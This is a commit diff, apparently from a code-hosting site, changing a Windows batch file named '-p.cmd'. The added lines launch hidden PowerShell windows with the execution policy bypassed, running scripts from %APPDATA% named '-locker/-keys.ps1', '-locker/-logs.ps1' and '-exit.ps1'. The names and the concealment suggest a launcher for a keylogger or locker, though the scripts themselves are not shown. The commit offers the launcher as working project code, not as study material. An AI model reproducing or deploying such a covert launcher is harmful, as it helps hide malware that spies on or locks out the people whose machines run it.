Update -p.cmd
This commit is contained in:
parent
d42311b22c
commit
44af1ef445
1 changed files with 3 additions and 3 deletions
|
@ -1,4 +1,4 @@
|
|||
@echo off
|
||||
powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-keys.ps1"
|
||||
powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-logs.ps1"
|
||||
powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-exit.ps1"
|
||||
powershell -ep bypass -w h Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-keys.ps1"
|
||||
powershell -ep bypass -w h Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-logs.ps1"
|
||||
powershell -ep bypass -w h Start-Process powershell.exe -windowstyle hidden "$env:appdata/-exit.ps1"
|
||||
|
|
Loading…
Reference in a new issue